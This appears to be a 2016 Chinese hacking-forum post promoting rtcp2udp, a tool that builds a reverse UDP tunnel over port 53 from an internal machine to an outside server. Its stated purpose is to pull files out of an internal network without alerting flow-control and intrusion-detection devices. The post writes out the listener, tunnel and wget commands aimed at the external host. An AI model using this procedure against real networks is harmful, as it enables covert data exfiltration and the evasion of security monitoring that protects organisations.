搜索
查看: 503|回复: 0

反向端口转发工具 (UDP协议隧道)

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2016-5-1 07:44:53 | 显示全部楼层 |阅读模式
项目地址
https://github.com/ring04h/rtcp2udp

[url=http://static.wooyun.org/upload/image/201604/2016042922551228952.png][/url]

# 描述
在Hack场景中,Hack人员需要从内网获取指定文件,
向外网传输时,不被流控设备,入侵检测设备所警觉;

本工具的原理为,向外网服务器建立一个反向的UDP(53)隧道,用于文件传输;

# 网络传输流程
外网客户端连接 119.29.29.29 的80端口,
等于连接内网 172.168.1.10 服务器的80端口,隧道采用UDP协议传输

# 使用说明
Http Server <- 内网机器 -> Internet Server (UDP隧道)
Client -> tcp:119.29.29.29:80 -> udp:119.29.29.29:53 -> tcp:172.168.1.10:80

1. 在你的外网服务器监听用于服务的 UDP&TCP 端口
这里假设场景,你的外网服务器 IP 为 119.29.29.29 运行的顺序,要先在远程服务器tcp2udp执行监听端口

  1. [root@localhost ~]# python tcp2udp.py -t 0.0.0.0:80 -u 0.0.0.0:53
  2. [INFO] UDPServer 0.0.0.0:53 Listening Success...
  3. [INFO] TCPServer 0.0.0.0:80 Listening Success...
复制代码
2. 在内网机器打通与外网服务器之间的 UDP 隧道

  1. [root@localhost ~]# python rtcp2udp.py -t 172.168.1.10:80 -u 119.29.29.29:53
  2. [INFO] Client Bridge Connection Success...
复制代码
3. 当隧道打通后,就可以开始文件传输服务

  1. [root@localhost ~]# wget http://119.29.29.29/src/file.tar.gz
复制代码



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表